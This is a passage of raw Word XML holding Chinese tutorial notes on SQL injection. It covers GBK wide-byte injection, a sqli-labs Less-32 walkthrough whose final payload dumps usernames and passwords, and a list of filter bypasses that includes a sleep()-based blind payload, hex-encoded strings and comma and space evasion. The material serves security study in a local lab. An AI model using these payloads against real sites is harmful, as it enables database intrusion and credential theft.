    <w:p w14:paraId="17D045A0" w14:textId="3F9FFAB3" w:rsidR="00EE1D42" w:rsidRDefault="00EE1D42" w:rsidP="00EE1D42">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过递交</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77618096" w14:textId="2D5D06FE" w:rsidR="00EE1D42" w:rsidRDefault="00EE1D42" w:rsidP="00EE1D42">
      <w:r w:rsidRPr="00EE1D42">
        <w:t>id=</w:t>
      </w:r>
      <w:r w:rsidR="007760FE">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1D42">
        <w:t>%df%27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0481757D" w14:textId="64E1FE1C" w:rsidR="00EE1D42" w:rsidRDefault="00EE1D42" w:rsidP="00EE1D42">
      <w:r w:rsidRPr="00EE1D42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1D42">
        <w:t>addslashes函数转义变成了id=</w:t>
      </w:r>
      <w:r w:rsidR="007760FE">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1D42">
        <w:t>%df%5c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1D42">
        <w:t>27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1D42">
        <w:t>MySQL服务器对查询语句进行GBK编码即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1D42">
        <w:t>%df%5c转换成了汉字運</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1D42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而单引号就逃逸了出来，从而造成了注入漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4302B1AD" w14:textId="5A2A75A3" w:rsidR="005E4B48" w:rsidRDefault="005E4B48" w:rsidP="00EE1D42">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当然</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1D42">
        <w:t>%5c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前可以</w:t>
      </w:r>
      <w:r w:rsidR="00047D41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>换成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任何ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005E4B48">
        <w:t>129-254</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的字符</w:t>
      </w:r>
      <w:r w:rsidR="00047D41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，只要被识别为中文即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD9EE8E" w14:textId="0846EE91" w:rsidR="00324577" w:rsidRDefault="00324577" w:rsidP="00EE1D42">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B64B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>例题：</w:t>
      </w:r>
      <w:r w:rsidRPr="006B64B4">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>sqli-labs Less-32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243AE846" w14:textId="1D22DC57" w:rsidR="00A864F0" w:rsidRDefault="00A864F0" w:rsidP="00EE1D42">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25CF9AA3" wp14:editId="2AABD54E">
            <wp:extent cx="5274310" cy="15462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C8A0" w14:textId="3E77C048" w:rsidR="00A864F0" w:rsidRDefault="00C9154F" w:rsidP="00EE1D42">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现输入的单引号前添加了反斜杠，</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9154F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果是在实战中，这不会有显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，故在各个闭合方式都无法成功时，可以尝试</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9154F">
        <w:t>%df%27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13184D12" w14:textId="70522325" w:rsidR="005E4B48" w:rsidRPr="00C9154F" w:rsidRDefault="005E4B48" w:rsidP="00EE1D42">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A1B25CD" wp14:editId="70F324B4">
            <wp:extent cx="5274310" cy="1549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3A7B" w14:textId="7C113949" w:rsidR="00A864F0" w:rsidRDefault="005E4B48" w:rsidP="00EE1D42">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试在单引号前加上</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9154F">
        <w:t>%df</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现可行</w:t>
      </w:r>
      <w:r w:rsidR="00047D41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并用order</w:t>
      </w:r>
      <w:r w:rsidR="00047D41">
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r w:rsidR="00047D41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试出</w:t>
      </w:r>
      <w:r w:rsidR="00047D41" w:rsidRPr="00047D41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段数目为</w:t>
      </w:r>
      <w:r w:rsidR="00047D41" w:rsidRPr="00047D41">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00047D41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCFAA98" w14:textId="2B432468" w:rsidR="00047D41" w:rsidRPr="005E4B48" w:rsidRDefault="002A2E3D" w:rsidP="00EE1D42">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49D86A12" wp14:editId="6FE5DDD7">
            <wp:extent cx="5274310" cy="16122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44FB" w14:textId="69312B3C" w:rsidR="00A864F0" w:rsidRDefault="007760FE" w:rsidP="002A2E3D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询表名时，因为单引号被转义</w:t>
      </w:r>
      <w:r w:rsidR="00F7250E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，故不能输入</w:t>
      </w:r>
      <w:r w:rsidR="00F7250E" w:rsidRPr="00F7250E">
        <w:t>table_schema='security'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E549BF4" w14:textId="4CAB1859" w:rsidR="00F7250E" w:rsidRDefault="00F7250E" w:rsidP="002A2E3D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7250E">
        <w:t>table_schema=database()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD1DC7B" w14:textId="2A494272" w:rsidR="00E139F6" w:rsidRDefault="00E139F6" w:rsidP="002A2E3D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5786CA9B" wp14:editId="2C28602A">
            <wp:extent cx="5274310" cy="16122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5C96" w14:textId="643F9568" w:rsidR="007760FE" w:rsidRDefault="00E139F6" w:rsidP="002A2E3D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询字段名时，也无法使用单引号，查阅发现居然可以将users转化为1</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进制，再加上0</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前缀，也可以执行语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B9BC55" w14:textId="7BA4C798" w:rsidR="007760FE" w:rsidRDefault="0070334F" w:rsidP="002A2E3D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B8A126B" wp14:editId="5FB5FF45">
            <wp:extent cx="5274310" cy="1686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C8FB" w14:textId="52061028" w:rsidR="00882026" w:rsidRDefault="00882026" w:rsidP="002A2E3D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076F7D7C" w14:textId="569CA4B0" w:rsidR="007760FE" w:rsidRPr="00882026" w:rsidRDefault="00882026" w:rsidP="002A2E3D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882026">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>http://127.0.0.1/sql1/Less-32/?id=-1%df%27%20union%20select%201,group_concat(username,123,password),3%20from%20security.users--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BDEAD2" w14:textId="5D7B49C0" w:rsidR="007760FE" w:rsidRDefault="00836BD1" w:rsidP="00836BD1">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>符号过滤绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC93991" w14:textId="654ADBF9" w:rsidR="00836BD1" w:rsidRPr="00836BD1" w:rsidRDefault="00836BD1" w:rsidP="00836BD1">
      <w:r w:rsidRPr="00836BD1">
        <w:t>1.绕过空格</w:t>
      </w:r>
      <w:r w:rsidR="001A29DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D2DBF0" w14:textId="327D03C2" w:rsidR="00836BD1" w:rsidRDefault="00836BD1" w:rsidP="00EE1D42">
      <w:r w:rsidRPr="00836BD1">
        <w:t>%a0=空格</w:t>
      </w:r>
      <w:r w:rsidR="001A29DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0834D75E" w14:textId="1B119E6F" w:rsidR="00836BD1" w:rsidRDefault="00836BD1" w:rsidP="00EE1D42">
      <w:r w:rsidRPr="00836BD1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00836BD1">
        <w:t>Tab代替空格</w:t>
      </w:r>
      <w:r w:rsidR="001A29DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2160CA" w14:textId="29966FEF" w:rsidR="006B64B4" w:rsidRDefault="00836BD1" w:rsidP="00EE1D42">
      <w:r w:rsidRPr="00836BD1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用注释替换空格</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00836BD1">
        <w:t>/*注释*/</w:t>
      </w:r>
      <w:r w:rsidR="001A29DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E156D44" w14:textId="629F17AB" w:rsidR="001A29DE" w:rsidRDefault="001A29DE" w:rsidP="001A29DE">
      <w:r>
        <w:t>2.括号绕过空格：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5FB5B0" w14:textId="77777777" w:rsidR="001A29DE" w:rsidRDefault="001A29DE" w:rsidP="001A29DE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果空格被过滤，括号没有被过滤，可以用括号绕过。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F821CB5" w14:textId="77777777" w:rsidR="001A29DE" w:rsidRDefault="001A29DE" w:rsidP="001A29DE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>MySQL中，括号是用来包围子查询的。因此，任何可以计算出结果的语句，都可以用括号包围起来。而括号的两端，可以没有多余的空格。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26003A93" w14:textId="77777777" w:rsidR="001A29DE" w:rsidRDefault="001A29DE" w:rsidP="001A29DE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B50F487" w14:textId="00E5ADDF" w:rsidR="001A29DE" w:rsidRDefault="001A29DE" w:rsidP="001A29DE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A29DE">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select(user())fromdualwhere(1=1)and(2=2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43822184" w14:textId="77777777" w:rsidR="001A29DE" w:rsidRDefault="001A29DE" w:rsidP="001A29DE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种过滤方法常常用于时间</w:t>
      </w:r>
      <w:r>
        <w:t>盲注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029276FA" w14:textId="53501D55" w:rsidR="001A29DE" w:rsidRDefault="001A29DE" w:rsidP="001A29DE">
      <w:r>
        <w:t>例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064C0521" w14:textId="208F93A0" w:rsidR="001A29DE" w:rsidRPr="001A29DE" w:rsidRDefault="001A29DE" w:rsidP="001A29DE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A29DE">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23</w:t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</w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29DE">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>既没有逗号也没有空格</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014C39B9" w14:textId="35CCEB26" w:rsidR="001A29DE" w:rsidRDefault="001A29DE" w:rsidP="001A29DE">
      <w:r w:rsidRPr="001A29DE">
        <w:t>3.引号绕过(使用十六进制)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E74492F" w14:textId="59672578" w:rsidR="001A29DE" w:rsidRDefault="001A29DE" w:rsidP="001A29DE">
      <w:r w:rsidRPr="001A29DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会使用到引号的地方一般是在最后的</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29DE">
        <w:t>where子句中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E09D7F9" w14:textId="1B28AAB4" w:rsidR="001A29DE" w:rsidRDefault="001A29DE" w:rsidP="001A29DE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022986D9" w14:textId="63BE83C6" w:rsidR="001A29DE" w:rsidRPr="001A29DE" w:rsidRDefault="001A29DE" w:rsidP="001A29DE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A29DE">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>selectcolumn_namefrominformation_schema.tableswheretable_name="users"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD9FAE1" w14:textId="11A16752" w:rsidR="001A29DE" w:rsidRDefault="007E6D98" w:rsidP="001A29DE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将users转化为1</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进制，即得</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7805632B" w14:textId="0330EE94" w:rsidR="007E6D98" w:rsidRPr="007E6D98" w:rsidRDefault="007E6D98" w:rsidP="001A29DE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E6D98">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>selectcolumn_namefrominformation_schema.tableswheretable_name=0x7573657273</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB199E8" w14:textId="4BFBC300" w:rsidR="007E6D98" w:rsidRDefault="007E6D98" w:rsidP="007E6D98">
      <w:r>
        <w:t>4.逗号绕过(使用from或者offset)：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA84744" w14:textId="5C26D479" w:rsidR="001A29DE" w:rsidRDefault="007E6D98" w:rsidP="007E6D98">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在使用盲注的时候，需要使用到</w:t>
      </w:r>
      <w:r>
        <w:t>substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>使用from to的方式来解决：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331A231A" w14:textId="5C908A67" w:rsidR="001A29DE" w:rsidRPr="00B736B6" w:rsidRDefault="00B736B6" w:rsidP="001A29DE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B736B6">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>and ascii(substr(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B736B6">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>database(),1,1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B736B6">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>))=xx %23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FD5384" w14:textId="301A82A3" w:rsidR="001A29DE" w:rsidRPr="00B736B6" w:rsidRDefault="00B736B6" w:rsidP="001A29DE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B736B6">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>and ascii(substr(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B736B6">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>database()from 1 for 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B736B6">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>))=xx %23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E6C3F0" w14:textId="1803A7A4" w:rsidR="00935AB6" w:rsidRDefault="00935AB6" w:rsidP="00935AB6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:t>limit可以使用offset来绕过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6A4CA5" w14:textId="5F430C0D" w:rsidR="001A29DE" w:rsidRPr="00935AB6" w:rsidRDefault="00935AB6" w:rsidP="00935AB6">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00935AB6">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select * from news limit 0,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3247E2" w14:textId="368BC173" w:rsidR="00935AB6" w:rsidRPr="00935AB6" w:rsidRDefault="00935AB6" w:rsidP="00935AB6">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00935AB6">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select * from news limit 1 offset 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D18B95" w14:textId="4619F4D3" w:rsidR="009616DA" w:rsidRDefault="00726283" w:rsidP="00935AB6">
      <w:r w:rsidRPr="00726283">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00726283">
        <w:t>join关键字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD2264E" w14:textId="48236768" w:rsidR="00726283" w:rsidRPr="00726283" w:rsidRDefault="00726283" w:rsidP="00935AB6">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726283">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>union select * from (select 1)a join (select 2)b join(select 3)c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5453E8B5" w14:textId="26B2B8D9" w:rsidR="009616DA" w:rsidRDefault="00726283" w:rsidP="00935AB6">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726283">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>union select 1,2,3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316A2870" w14:textId="09E9C6B9" w:rsidR="00726283" w:rsidRDefault="00726283" w:rsidP="00726283">
      <w:r w:rsidRPr="00726283">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00726283">
        <w:t>like关键字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68794AB9" w14:textId="2CE597AB" w:rsidR="00726283" w:rsidRPr="00726283" w:rsidRDefault="00726283" w:rsidP="00726283">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726283">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>mysql&gt; select ascii(substr(user(),1,1))=114;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09125BBB" w14:textId="2055CA82" w:rsidR="00726283" w:rsidRPr="00726283" w:rsidRDefault="00726283" w:rsidP="00935AB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Microsoft YaHei UI Light"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726283">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>mysql&gt; select user() like "r%";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21919C3C" w14:textId="1F5B3524" w:rsidR="00935AB6" w:rsidRDefault="00935AB6" w:rsidP="00935AB6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比较符绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E39047F" w14:textId="56190FD6" w:rsidR="00935AB6" w:rsidRDefault="00694019" w:rsidP="00935AB6">
      <w:r w:rsidRPr="00694019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用盲注的时候需要使用到比较操作符来进行查找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这时可以用到</w:t>
      </w:r>
      <w:r w:rsidRPr="00694019">
        <w:t>greatest</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00694019">
        <w:t>来代替比较操作符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00694019">
        <w:t>greatest(n1,n2,n3</w:t>
      </w:r>
      <w:r>
        <w:t>,......</w:t>
      </w:r>
      <w:r w:rsidRPr="00694019">
        <w:t>)函数返回输入参数(n1,n2,n3,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>.....</w:t>
      </w:r>
      <w:r w:rsidRPr="00694019">
        <w:t>)的最大值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565FBEDF" w14:textId="2861CB5A" w:rsidR="00935AB6" w:rsidRPr="00694019" w:rsidRDefault="00694019" w:rsidP="00935AB6">
